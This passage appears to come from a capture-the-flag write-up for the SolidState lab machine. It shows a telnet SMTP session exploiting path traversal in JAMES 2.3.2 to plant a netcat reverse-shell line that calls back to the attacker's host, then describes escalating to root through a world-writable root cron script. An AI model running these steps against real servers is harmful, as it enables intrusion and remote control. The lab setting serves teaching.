After trying to escape the shell it was to no avail, however, From the above exploit we can execute code to establish a reverse shell. This may escape us from the mindy shell to a better shell, im thinking a Ben Franklin kinda shell. Create an user with the following name and password on the James Remote Server
kali@kali:/opt$ telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Tue, 13 Oct 2020 07:55:43 -0400 (EDT)
ECHLO test.test
500 5.5.1 Command ECHLO unrecognized.
EHLO test.test
250-solidstate Hello test.test (10.10.14.34 [10.10.14.34])
250-PIPELINING
250 ENHANCEDSTATUSCODES
MAIL FROM: <random@random.com>
250 2.1.0 Sender <random@random.com> OK
RCPT TO: <../../../../../../../../etc/bash_completion.d@localhost> 250 2.1.5 Recipient <../../../../../../../../etc/bash_completion.d@localhost> OK
DATA
354 Ok Send data ending with <CRLF>.<CRLF>
FROM test.test
'
/bin/nc -e /bin/bash 10.10.10.14.34 4444
.
250 2.6.0 Message received
quit
221 2.0.0 solidstate Service closing transmission channel
Connection closed by foreign host.
That single quote above is so that the file is interpreted properly at the back end and our reverse shell returns
Logging in back into mindy will execute our reverse shell.
After getting our reverse shell and runnning pspy32, we are able to find the following python file.
It appears to be a cronjob that executes a python script that deletes the tmp directory. Further looking at this file and its permissions something stood out.
This file can be ran and executed as root and WRITTEN by ANY user!
adding python code to establish a reverse shell will give us a reverse connetion with root
